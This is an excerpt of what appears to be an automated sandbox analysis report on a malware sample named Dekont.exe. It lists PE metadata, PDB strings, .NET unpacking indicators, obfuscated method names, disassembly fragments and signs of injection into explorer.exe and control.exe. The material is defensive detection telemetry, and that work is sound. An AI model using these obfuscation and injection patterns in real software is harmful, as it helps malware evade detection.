          Source: Dekont.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Dekont.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: GHQc.pdb source: explorer.exe, 00000006.00000002.4539578368.0000000010ACF000.00000004.80000000.00040000.00000000.sdmp, control.exe, 00000008.00000002.4520058887.000000000525F000.00000004.10000000.00040000.00000000.sdmp, control.exe, 00000008.00000002.4518750367.00000000049A0000.00000004.00000020.00020000.00000000.sdmp, Dekont.exe
          Source: Binary string: wntdll.pdbUGP source: Dekont.exe, 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000008.00000002.4519339857.0000000004EAE000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000008.00000003.2146384176.0000000004B5F000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000008.00000002.4519339857.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000008.00000003.2143082654.00000000049AD000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: control.pdb source: Dekont.exe, 00000005.00000002.2142264362.0000000000B47000.00000004.00000020.00020000.00000000.sdmp, Dekont.exe, 00000005.00000002.2145040101.0000000002B80000.00000040.10000000.00040000.00000000.sdmp, control.exe, control.exe, 00000008.00000002.4517839714.0000000000870000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: GHQc.pdbSHA256 source: explorer.exe, 00000006.00000002.4539578368.0000000010ACF000.00000004.80000000.00040000.00000000.sdmp, control.exe, 00000008.00000002.4520058887.000000000525F000.00000004.10000000.00040000.00000000.sdmp, control.exe, 00000008.00000002.4518750367.00000000049A0000.00000004.00000020.00020000.00000000.sdmp, Dekont.exe
          Source: Binary string: wntdll.pdb source: Dekont.exe, Dekont.exe, 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, control.exe, control.exe, 00000008.00000002.4519339857.0000000004EAE000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000008.00000003.2146384176.0000000004B5F000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000008.00000002.4519339857.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000008.00000003.2143082654.00000000049AD000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: control.pdbUGP source: Dekont.exe, 00000005.00000002.2142264362.0000000000B47000.00000004.00000020.00020000.00000000.sdmp, Dekont.exe, 00000005.00000002.2145040101.0000000002B80000.00000040.10000000.00040000.00000000.sdmp, control.exe, 00000008.00000002.4517839714.0000000000870000.00000040.80000000.00040000.00000000.sdmp

          Data Obfuscation

          barindex
          .NET source code contains potential unpacker
          Source: Dekont.exe, VentanaPrincipal.cs.Net Code: InitializeComponent System.AppDomain.Load(byte[])
          Source: 0.2.Dekont.exe.29b1708.0.raw.unpack, QBy45BY4uMbUQs88Qq.cs.Net Code: KmDc5Q9bs System.Reflection.Assembly.Load(byte[])
          Source: 0.2.Dekont.exe.29a52f0.1.raw.unpack, QBy45BY4uMbUQs88Qq.cs.Net Code: KmDc5Q9bs System.Reflection.Assembly.Load(byte[])
          Source: 0.2.Dekont.exe.2956ed4.2.raw.unpack, QBy45BY4uMbUQs88Qq.cs.Net Code: KmDc5Q9bs System.Reflection.Assembly.Load(byte[])
          Source: 0.2.Dekont.exe.3b6bdc0.3.raw.unpack, pbLZmIIBDF2cAWVYsk.cs.Net Code: I5nrIX4NqH System.Reflection.Assembly.Load(byte[])
          Source: 0.2.Dekont.exe.6b00000.4.raw.unpack, QBy45BY4uMbUQs88Qq.cs.Net Code: KmDc5Q9bs System.Reflection.Assembly.Load(byte[])
          Source: 0.2.Dekont.exe.96e0000.5.raw.unpack, pbLZmIIBDF2cAWVYsk.cs.Net Code: I5nrIX4NqH System.Reflection.Assembly.Load(byte[])
          Source: 6.2.explorer.exe.10acf840.0.raw.unpack, VentanaPrincipal.cs.Net Code: InitializeComponent System.AppDomain.Load(byte[])
          Source: 8.2.control.exe.525f840.3.raw.unpack, VentanaPrincipal.cs.Net Code: InitializeComponent System.AppDomain.Load(byte[])
          Source: Dekont.exeStatic PE information: 0x8F76A18B [Mon Apr 9 19:54:51 2046 UTC]
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0041B863 push esi; iretd 5_2_0041B866
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00416B15 push 560BADFBh; retf 5_2_00416B1A
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0040E44C push fs; iretd 5_2_0040E453
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0041D4D2 push eax; ret 5_2_0041D4D8
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0041D4DB push eax; ret 5_2_0041D542
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0041D485 push eax; ret 5_2_0041D4D8
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0041D53C push eax; ret 5_2_0041D542
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FA225F pushad ; ret 5_2_00FA27F9
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FA27FA pushad ; ret 5_2_00FA27F9
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FA283D push eax; iretd 5_2_00FA2858
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FD09AD push ecx; mov dword ptr [esp], ecx5_2_00FD09B6
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FA1366 push eax; iretd 5_2_00FA1369
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FA9939 push es; iretd 5_2_00FA9940
          Source: C:\Windows\explorer.exeCode function: 6_2_0E514B1E push esp; retn 0000h6_2_0E514B1F
          Source: C:\Windows\explorer.exeCode function: 6_2_0E514B02 push esp; retn 0000h6_2_0E514B03
          Source: C:\Windows\explorer.exeCode function: 6_2_0E5149B5 push esp; retn 0000h6_2_0E514AE7
          Source: C:\Windows\explorer.exeCode function: 6_2_0E753B1E push esp; retn 0000h6_2_0E753B1F
          Source: C:\Windows\explorer.exeCode function: 6_2_0E753B02 push esp; retn 0000h6_2_0E753B03
          Source: C:\Windows\explorer.exeCode function: 6_2_0E7539B5 push esp; retn 0000h6_2_0E753AE7
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0087486D push ecx; ret 8_2_00874880
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04D409AD push ecx; mov dword ptr [esp], ecx8_2_04D409B6
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_02B4D485 push eax; ret 8_2_02B4D4D8
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_02B4D4D2 push eax; ret 8_2_02B4D4D8
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_02B4D4DB push eax; ret 8_2_02B4D542
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_02B3E44C push fs; iretd 8_2_02B3E453
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_02B4D53C push eax; ret 8_2_02B4D542
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_02B46B15 push 560BADFBh; retf 8_2_02B46B1A
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_02B4B863 push esi; iretd 8_2_02B4B866
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04B1E9B5 push esp; retn 0000h8_2_04B1EAE7
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04B1EB1E push esp; retn 0000h8_2_04B1EB1F
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04B1EB02 push esp; retn 0000h8_2_04B1EB03
          Source: Dekont.exeStatic PE information: section name: .text entropy: 7.817099894790621
          Source: 0.2.Dekont.exe.29b1708.0.raw.unpack, kD0JNdgNBriBGn5egS.csHigh entropy of concatenated method names: 'ubU6vJppswKkZ', 'uvAmfDYbimWPg9rmyH6', 'XHYItoYHo1DoUvgeuNZ', 'tYVkNWYXlYIi7gDFfLn', 'TV4H82YzoL7kT86loIA', 'yoiEG7M3KqRFDlQAaqW', 'rU4RpWYS77WPQpUZwKR', 'vGvSIFYGEhSitdykOPg', 'TCSl6vMYjB5c5h75h4u'
          Source: 0.2.Dekont.exe.29b1708.0.raw.unpack, QBy45BY4uMbUQs88Qq.csHigh entropy of concatenated method names: 'QByY45B4u', 'EbUNQs88Q', 'D8PguGCCm', 'gfwtorebq', 'rQ9oD0JNd', 'cBrXiBGn5', 'sgS08fT72', 'lmAQKmrG6', 'qn1mTNvNO', 'K084ZL4CG'
          Source: 0.2.Dekont.exe.29a52f0.1.raw.unpack, kD0JNdgNBriBGn5egS.csHigh entropy of concatenated method names: 'ubU6vJppswKkZ', 'uvAmfDYbimWPg9rmyH6', 'XHYItoYHo1DoUvgeuNZ', 'tYVkNWYXlYIi7gDFfLn', 'TV4H82YzoL7kT86loIA', 'yoiEG7M3KqRFDlQAaqW', 'rU4RpWYS77WPQpUZwKR', 'vGvSIFYGEhSitdykOPg', 'TCSl6vMYjB5c5h75h4u'
          Source: 0.2.Dekont.exe.29a52f0.1.raw.unpack, QBy45BY4uMbUQs88Qq.csHigh entropy of concatenated method names: 'QByY45B4u', 'EbUNQs88Q', 'D8PguGCCm', 'gfwtorebq', 'rQ9oD0JNd', 'cBrXiBGn5', 'sgS08fT72', 'lmAQKmrG6', 'qn1mTNvNO', 'K084ZL4CG'
          Source: 0.2.Dekont.exe.2956ed4.2.raw.unpack, kD0JNdgNBriBGn5egS.csHigh entropy of concatenated method names: 'ubU6vJppswKkZ', 'uvAmfDYbimWPg9rmyH6', 'XHYItoYHo1DoUvgeuNZ', 'tYVkNWYXlYIi7gDFfLn', 'TV4H82YzoL7kT86loIA', 'yoiEG7M3KqRFDlQAaqW', 'rU4RpWYS77WPQpUZwKR', 'vGvSIFYGEhSitdykOPg', 'TCSl6vMYjB5c5h75h4u'
          Source: 0.2.Dekont.exe.2956ed4.2.raw.unpack, QBy45BY4uMbUQs88Qq.csHigh entropy of concatenated method names: 'QByY45B4u', 'EbUNQs88Q', 'D8PguGCCm', 'gfwtorebq', 'rQ9oD0JNd', 'cBrXiBGn5', 'sgS08fT72', 'lmAQKmrG6', 'qn1mTNvNO', 'K084ZL4CG'
          Source: 0.2.Dekont.exe.3b6bdc0.3.raw.unpack, o53xV5KVBHNlMPrt1S.csHigh entropy of concatenated method names: 'mqheckIk2T', 'V28e2qhPUv', 'KWxerfPQ8h', 'JjWeYpj8RG', 'cKaehwFV3m', 'aq6eQtx29Q', 'pRhe409pl5', 'Lv2ZMv5vwL', 'tBtZxvvjGW', 'UJDZgABUqJ'
          Source: 0.2.Dekont.exe.3b6bdc0.3.raw.unpack, dXLIi90gD1YxCP2VrY.csHigh entropy of concatenated method names: 'q9CQuOHWOG', 'n9BQ6riu3T', 'pJ5XVLtfFs', 'w5RXtBUbta', 'DG7XkgZgxe', 'uDMXbjwMLo', 'P25XlAVDcW', 'F4uXqBdOST', 'AmSXniZ8RB', 'N6gXNeZXMK'
          Source: 0.2.Dekont.exe.3b6bdc0.3.raw.unpack, wvystYkjMk7ZUTRB0S.csHigh entropy of concatenated method names: 'vlW83RCbW6', 'L5u8Rk0ysw', 'ToString', 'vPY8YiKdOa', 'akL8hgxt7j', 'wta8XiouTF', 'hXE8QaWBcq', 'ncI84nxoPu', 'nXr8OcUavP', 'PWY8dNL2sO'
          Source: 0.2.Dekont.exe.3b6bdc0.3.raw.unpack, txyEf8lPUyG2q9TDW7.csHigh entropy of concatenated method names: 'Dispose', 'WK2cgVR8DW', 'tfZwHvQKfG', 'AbHWW65WQw', 'xTLcsiSS4b', 'sROczxGCkr', 'ProcessDialogKey', 'G7xwiYqJxv', 'S2NwcH4UF8', 'NpFwwflFHf'
          Source: 0.2.Dekont.exe.3b6bdc0.3.raw.unpack, l8w9g3UwQjCrXkQh1u.csHigh entropy of concatenated method names: 'P1OZYmPAGb', 'eVZZhJPDEn', 'Fs3ZXnp3UU', 'OeaZQZF5XW', 'QKvZ4EwxlZ', 'JdgZOm51pm', 'wj3ZdO7jw4', 'XErZye8rKd', 'DUIZ3RvS1M', 'HojZRe23QE'
          Source: 0.2.Dekont.exe.3b6bdc0.3.raw.unpack, KD9NLjLBrKbWoWnWrg.csHigh entropy of concatenated method names: 'lWdcOJNBsd', 'jegcdymrrY', 'FCMc38EvfK', 'u4xcRT7VSn', 'AhMcS7ECC6', 'tMPcDrFeU7', 'rqK88ujS5scBQjjMU3', 'bHh332vbL99a5JcJkg', 'HYZcckW95P', 'iOkc2M5xet'
          Source: 0.2.Dekont.exe.3b6bdc0.3.raw.unpack, gWTlBZonjyVIuDSAHUr.csHigh entropy of concatenated method names: 'MaweaA3m1L', 'tGUe1DttpK', 'kGPeI3TaV0', 'apmejgQAOu', 'bQZeukoDRL', 'vRle0Ht4nW', 'BUre6MVdVj', 'FKDeJwilQf', 'bq7eoKfgqP', 'hYieCFgvOo'
          Source: 0.2.Dekont.exe.3b6bdc0.3.raw.unpack, pbLZmIIBDF2cAWVYsk.csHigh entropy of concatenated method names: 'lx02GnftrP', 'QGV2YDEj3h', 'ja22hDBI5v', 'xPu2XXBTHt', 'Nah2QssMHN', 'jer24ynLNl', 'h4M2OBylfs', 'HAw2dhch36', 'AhV2yP1Cpi', 'O6q230r0P1'
          Source: 0.2.Dekont.exe.3b6bdc0.3.raw.unpack, Ad5pmqbSK6iCB0EGWU.csHigh entropy of concatenated method names: 'fj6SN1q3od', 'Hy9SU0CDG6', 'O0dSvxmxfT', 'JNESmNdBZc', 'WNXSHjMPMZ', 'zhDSVY1nmr', 't2MStoOP4b', 'iGESktvfGK', 'i64SbQD7Tm', 'GccSlfFnjf'
          Source: 0.2.Dekont.exe.3b6bdc0.3.raw.unpack, ORM41fq3I7IrBKpxUd.csHigh entropy of concatenated method names: 'CrgOYeSIuG', 'VqjOXpM6Fu', 'e0OO4UANYu', 'ryp4sh3ERV', 'KDN4zBNW7A', 'bbdOiq9HnG', 'tRuOcTb6hk', 'mbqOwJKeN6', 'TyiO235F11', 'j7POrHAyco'
          Source: 0.2.Dekont.exe.3b6bdc0.3.raw.unpack, MI7I9Fpik0BUQMQXNc.csHigh entropy of concatenated method names: 'sMX8xphxPt', 'Cip8sU089m', 'qZ2ZiBD5H1', 'ugAZcYg1AO', 'ALM89bd17W', 'b6I8UWCcpJ', 'F6L8ptYCd0', 'ul08v3foVc', 'Q5a8mBUGxG', 'vA987G2Six'
          Source: 0.2.Dekont.exe.3b6bdc0.3.raw.unpack, bcV7k82yEqiBMuldyC.csHigh entropy of concatenated method names: 'mNkOa8pRpu', 'yN5O1PJH7n', 'r3KOICIyv3', 'QXgOj3EAnn', 'FAPOuscfD2', 'vnwO0xLH1r', 'tYFO6MbkGa', 'FVWOJfDLtU', 'wgJOoWQpUr', 'BhbOCBb5w4'
          Source: 0.2.Dekont.exe.3b6bdc0.3.raw.unpack, U196kdwOqVNkxOOxEn.csHigh entropy of concatenated method names: 'by7khNHkWuqghUAxT3L', 'Gj6mRmHCfwc2y77YC8e', 'RCq4Z3dp7c', 'YSh4e88EIV', 'cJp4KrBqBC', 'vgwmxXHoIGJZnd6vJtx', 'cSib3lHAKqkndW02HL9'
          Source: 0.2.Dekont.exe.3b6bdc0.3.raw.unpack, TltckUFlAMS9dBCY9B.csHigh entropy of concatenated method names: 'tW5PJRkPxj', 'Xq1Po6VtkJ', 'nAtPAqOAdm', 't69PH4wJmO', 'sm9Pt77c4e', 'sJSPkyk8wm', 'OhaPl4topN', 'EJUPq1iy0T', 'DuePNSOlU0', 'fZ0P9UbQQB'
          Source: 0.2.Dekont.exe.3b6bdc0.3.raw.unpack, RDfAsr61tisr2BWDyu.csHigh entropy of concatenated method names: 'fqLZAgcn5F', 'KchZH07OJ2', 's4NZVDvRhu', 'mNQZtqpTwd', 'h6gZvo0MFU', 'eKIZkRwqHs', 'Next', 'Next', 'Next', 'NextBytes'
          Source: 0.2.Dekont.exe.3b6bdc0.3.raw.unpack, TmW8s33hG4mvQaB21F.csHigh entropy of concatenated method names: 'J86IjMEvH', 'Kjvjm3UhD', 'oe70ZKVhC', 'zcM6Bu5Lu', 'ibpoRMfud', 'iKyCZlPcb', 'SrsRKgN4GU3JxAnNPn', 'H7tQrNRYT1j8TFisQl', 'v0VZsiquV', 'kjuKvBCy6'
          Source: 0.2.Dekont.exe.3b6bdc0.3.raw.unpack, qjgvDPGw0dLJ1Nb1m8.csHigh entropy of concatenated method names: 'xPohvhI7wI', 'jh2hmSvfOf', 'ICWh7Hx5ZS', 'YyUhLCGBae', 'WdjhBHw9fq', 'tqvhTCra35', 'h2yhMtgBhG', 'BlRhxm2YRO', 'xEuhgPw9Lb', 'I1ghsuhBSG'
          Source: 0.2.Dekont.exe.3b6bdc0.3.raw.unpack, e5nxOdzlIYqo79mMuV.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'VrYeP8GLLf', 'JWBeS9rm0R', 'VCReDPD0Qq', 'Hmme8IlYWC', 'qJleZTWKsj', 'xOueew4kYS', 'vPseK3fTt9'
          Source: 0.2.Dekont.exe.3b6bdc0.3.raw.unpack, kwJxqdN3GExdyc1bPB.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'YxXwgLKhOk', 'Q5CwsZw8Fv', 'kGswzPU1BP', 'JGq2ij5Xvf', 'dxh2c7Jhkd', 'YWt2wOZJxq', 'tlp22JH6MQ', 'Ptpgh616eHHrjVSnlE5'
          Source: 0.2.Dekont.exe.3b6bdc0.3.raw.unpack, hP0qnVoCrnGXfRDPQpc.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'CruKv4dcEc', 'PQ9KmWffmv', 'fwYK7oF8W7', 'gqjKLbR4dB', 'acVKB1Wnpk', 'iQsKTECdhF', 'VCAKM53rga'
          Source: 0.2.Dekont.exe.3b6bdc0.3.raw.unpack, LCBpR6tWKBHvi4TDRT.csHigh entropy of concatenated method names: 'H4pXjdBst0', 'pawX0TDqL6', 'zreXJN8Fmq', 'CsQXoV2Z0j', 'ofdXSG2FAZ', 'C4rXDsEs1C', 'XubX89bhYu', 'ltVXZ9g5m2', 'IZTXeAaRo5', 'rInXKgKpIs'
          Source: 0.2.Dekont.exe.3b6bdc0.3.raw.unpack, Sy7nxMaCWn0aUQoKQl.csHigh entropy of concatenated method names: 'HQL4GKGI0I', 'Htp4herFmm', 'EQo4Q10Xh3', 'su14Oq4xeA', 'Cnv4dCLZQA', 'RRxQBwl9Lp', 'AcTQTNc8kQ', 'n48QMR4o6O', 'uRKQxALOl0', 'jW4Qg0P5ry'
          Source: 0.2.Dekont.exe.6b00000.4.raw.unpack, kD0JNdgNBriBGn5egS.csHigh entropy of concatenated method names: 'ubU6vJppswKkZ', 'uvAmfDYbimWPg9rmyH6', 'XHYItoYHo1DoUvgeuNZ', 'tYVkNWYXlYIi7gDFfLn', 'TV4H82YzoL7kT86loIA', 'yoiEG7M3KqRFDlQAaqW', 'rU4RpWYS77WPQpUZwKR', 'vGvSIFYGEhSitdykOPg', 'TCSl6vMYjB5c5h75h4u'
          Source: 0.2.Dekont.exe.6b00000.4.raw.unpack, QBy45BY4uMbUQs88Qq.csHigh entropy of concatenated method names: 'QByY45B4u', 'EbUNQs88Q', 'D8PguGCCm', 'gfwtorebq', 'rQ9oD0JNd', 'cBrXiBGn5', 'sgS08fT72', 'lmAQKmrG6', 'qn1mTNvNO', 'K084ZL4CG'
          Source: 0.2.Dekont.exe.96e0000.5.raw.unpack, o53xV5KVBHNlMPrt1S.csHigh entropy of concatenated method names: 'mqheckIk2T', 'V28e2qhPUv', 'KWxerfPQ8h', 'JjWeYpj8RG', 'cKaehwFV3m', 'aq6eQtx29Q', 'pRhe409pl5', 'Lv2ZMv5vwL', 'tBtZxvvjGW', 'UJDZgABUqJ'
          Source: 0.2.Dekont.exe.96e0000.5.raw.unpack, dXLIi90gD1YxCP2VrY.csHigh entropy of concatenated method names: 'q9CQuOHWOG', 'n9BQ6riu3T', 'pJ5XVLtfFs', 'w5RXtBUbta', 'DG7XkgZgxe', 'uDMXbjwMLo', 'P25XlAVDcW', 'F4uXqBdOST', 'AmSXniZ8RB', 'N6gXNeZXMK'
          Source: 0.2.Dekont.exe.96e0000.5.raw.unpack, wvystYkjMk7ZUTRB0S.csHigh entropy of concatenated method names: 'vlW83RCbW6', 'L5u8Rk0ysw', 'ToString', 'vPY8YiKdOa', 'akL8hgxt7j', 'wta8XiouTF', 'hXE8QaWBcq', 'ncI84nxoPu', 'nXr8OcUavP', 'PWY8dNL2sO'
          Source: 0.2.Dekont.exe.96e0000.5.raw.unpack, txyEf8lPUyG2q9TDW7.csHigh entropy of concatenated method names: 'Dispose', 'WK2cgVR8DW', 'tfZwHvQKfG', 'AbHWW65WQw', 'xTLcsiSS4b', 'sROczxGCkr', 'ProcessDialogKey', 'G7xwiYqJxv', 'S2NwcH4UF8', 'NpFwwflFHf'
          Source: 0.2.Dekont.exe.96e0000.5.raw.unpack, l8w9g3UwQjCrXkQh1u.csHigh entropy of concatenated method names: 'P1OZYmPAGb', 'eVZZhJPDEn', 'Fs3ZXnp3UU', 'OeaZQZF5XW', 'QKvZ4EwxlZ', 'JdgZOm51pm', 'wj3ZdO7jw4', 'XErZye8rKd', 'DUIZ3RvS1M', 'HojZRe23QE'
          Source: 0.2.Dekont.exe.96e0000.5.raw.unpack, KD9NLjLBrKbWoWnWrg.csHigh entropy of concatenated method names: 'lWdcOJNBsd', 'jegcdymrrY', 'FCMc38EvfK', 'u4xcRT7VSn', 'AhMcS7ECC6', 'tMPcDrFeU7', 'rqK88ujS5scBQjjMU3', 'bHh332vbL99a5JcJkg', 'HYZcckW95P', 'iOkc2M5xet'
          Source: 0.2.Dekont.exe.96e0000.5.raw.unpack, gWTlBZonjyVIuDSAHUr.csHigh entropy of concatenated method names: 'MaweaA3m1L', 'tGUe1DttpK', 'kGPeI3TaV0', 'apmejgQAOu', 'bQZeukoDRL', 'vRle0Ht4nW', 'BUre6MVdVj', 'FKDeJwilQf', 'bq7eoKfgqP', 'hYieCFgvOo'
          Source: 0.2.Dekont.exe.96e0000.5.raw.unpack, pbLZmIIBDF2cAWVYsk.csHigh entropy of concatenated method names: 'lx02GnftrP', 'QGV2YDEj3h', 'ja22hDBI5v', 'xPu2XXBTHt', 'Nah2QssMHN', 'jer24ynLNl', 'h4M2OBylfs', 'HAw2dhch36', 'AhV2yP1Cpi', 'O6q230r0P1'
          Source: 0.2.Dekont.exe.96e0000.5.raw.unpack, Ad5pmqbSK6iCB0EGWU.csHigh entropy of concatenated method names: 'fj6SN1q3od', 'Hy9SU0CDG6', 'O0dSvxmxfT', 'JNESmNdBZc', 'WNXSHjMPMZ', 'zhDSVY1nmr', 't2MStoOP4b', 'iGESktvfGK', 'i64SbQD7Tm', 'GccSlfFnjf'
          Source: 0.2.Dekont.exe.96e0000.5.raw.unpack, ORM41fq3I7IrBKpxUd.csHigh entropy of concatenated method names: 'CrgOYeSIuG', 'VqjOXpM6Fu', 'e0OO4UANYu', 'ryp4sh3ERV', 'KDN4zBNW7A', 'bbdOiq9HnG', 'tRuOcTb6hk', 'mbqOwJKeN6', 'TyiO235F11', 'j7POrHAyco'
          Source: 0.2.Dekont.exe.96e0000.5.raw.unpack, MI7I9Fpik0BUQMQXNc.csHigh entropy of concatenated method names: 'sMX8xphxPt', 'Cip8sU089m', 'qZ2ZiBD5H1', 'ugAZcYg1AO', 'ALM89bd17W', 'b6I8UWCcpJ', 'F6L8ptYCd0', 'ul08v3foVc', 'Q5a8mBUGxG', 'vA987G2Six'
          Source: 0.2.Dekont.exe.96e0000.5.raw.unpack, bcV7k82yEqiBMuldyC.csHigh entropy of concatenated method names: 'mNkOa8pRpu', 'yN5O1PJH7n', 'r3KOICIyv3', 'QXgOj3EAnn', 'FAPOuscfD2', 'vnwO0xLH1r', 'tYFO6MbkGa', 'FVWOJfDLtU', 'wgJOoWQpUr', 'BhbOCBb5w4'
          Source: 0.2.Dekont.exe.96e0000.5.raw.unpack, U196kdwOqVNkxOOxEn.csHigh entropy of concatenated method names: 'by7khNHkWuqghUAxT3L', 'Gj6mRmHCfwc2y77YC8e', 'RCq4Z3dp7c', 'YSh4e88EIV', 'cJp4KrBqBC', 'vgwmxXHoIGJZnd6vJtx', 'cSib3lHAKqkndW02HL9'
          Source: 0.2.Dekont.exe.96e0000.5.raw.unpack, TltckUFlAMS9dBCY9B.csHigh entropy of concatenated method names: 'tW5PJRkPxj', 'Xq1Po6VtkJ', 'nAtPAqOAdm', 't69PH4wJmO', 'sm9Pt77c4e', 'sJSPkyk8wm', 'OhaPl4topN', 'EJUPq1iy0T', 'DuePNSOlU0', 'fZ0P9UbQQB'
          Source: 0.2.Dekont.exe.96e0000.5.raw.unpack, RDfAsr61tisr2BWDyu.csHigh entropy of concatenated method names: 'fqLZAgcn5F', 'KchZH07OJ2', 's4NZVDvRhu', 'mNQZtqpTwd', 'h6gZvo0MFU', 'eKIZkRwqHs', 'Next', 'Next', 'Next', 'NextBytes'
          Source: 0.2.Dekont.exe.96e0000.5.raw.unpack, TmW8s33hG4mvQaB21F.csHigh entropy of concatenated method names: 'J86IjMEvH', 'Kjvjm3UhD', 'oe70ZKVhC', 'zcM6Bu5Lu', 'ibpoRMfud', 'iKyCZlPcb', 'SrsRKgN4GU3JxAnNPn', 'H7tQrNRYT1j8TFisQl', 'v0VZsiquV', 'kjuKvBCy6'
          Source: 0.2.Dekont.exe.96e0000.5.raw.unpack, qjgvDPGw0dLJ1Nb1m8.csHigh entropy of concatenated method names: 'xPohvhI7wI', 'jh2hmSvfOf', 'ICWh7Hx5ZS', 'YyUhLCGBae', 'WdjhBHw9fq', 'tqvhTCra35', 'h2yhMtgBhG', 'BlRhxm2YRO', 'xEuhgPw9Lb', 'I1ghsuhBSG'
          Source: 0.2.Dekont.exe.96e0000.5.raw.unpack, e5nxOdzlIYqo79mMuV.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'VrYeP8GLLf', 'JWBeS9rm0R', 'VCReDPD0Qq', 'Hmme8IlYWC', 'qJleZTWKsj', 'xOueew4kYS', 'vPseK3fTt9'
          Source: 0.2.Dekont.exe.96e0000.5.raw.unpack, kwJxqdN3GExdyc1bPB.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'YxXwgLKhOk', 'Q5CwsZw8Fv', 'kGswzPU1BP', 'JGq2ij5Xvf', 'dxh2c7Jhkd', 'YWt2wOZJxq', 'tlp22JH6MQ', 'Ptpgh616eHHrjVSnlE5'
          Source: 0.2.Dekont.exe.96e0000.5.raw.unpack, hP0qnVoCrnGXfRDPQpc.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'CruKv4dcEc', 'PQ9KmWffmv', 'fwYK7oF8W7', 'gqjKLbR4dB', 'acVKB1Wnpk', 'iQsKTECdhF', 'VCAKM53rga'
          Source: 0.2.Dekont.exe.96e0000.5.raw.unpack, LCBpR6tWKBHvi4TDRT.csHigh entropy of concatenated method names: 'H4pXjdBst0', 'pawX0TDqL6', 'zreXJN8Fmq', 'CsQXoV2Z0j', 'ofdXSG2FAZ', 'C4rXDsEs1C', 'XubX89bhYu', 'ltVXZ9g5m2', 'IZTXeAaRo5', 'rInXKgKpIs'
          Source: 0.2.Dekont.exe.96e0000.5.raw.unpack, Sy7nxMaCWn0aUQoKQl.csHigh entropy of concatenated method names: 'HQL4GKGI0I', 'Htp4herFmm', 'EQo4Q10Xh3', 'su14Oq4xeA', 'Cnv4dCLZQA', 'RRxQBwl9Lp', 'AcTQTNc8kQ', 'n48QMR4o6O', 'uRKQxALOl0', 'jW4Qg0P5ry'

          Hooking and other Techniques for Hiding and Protection

          barindex
          Loading BitLocker PowerShell Module
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Users\user\Desktop\Dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
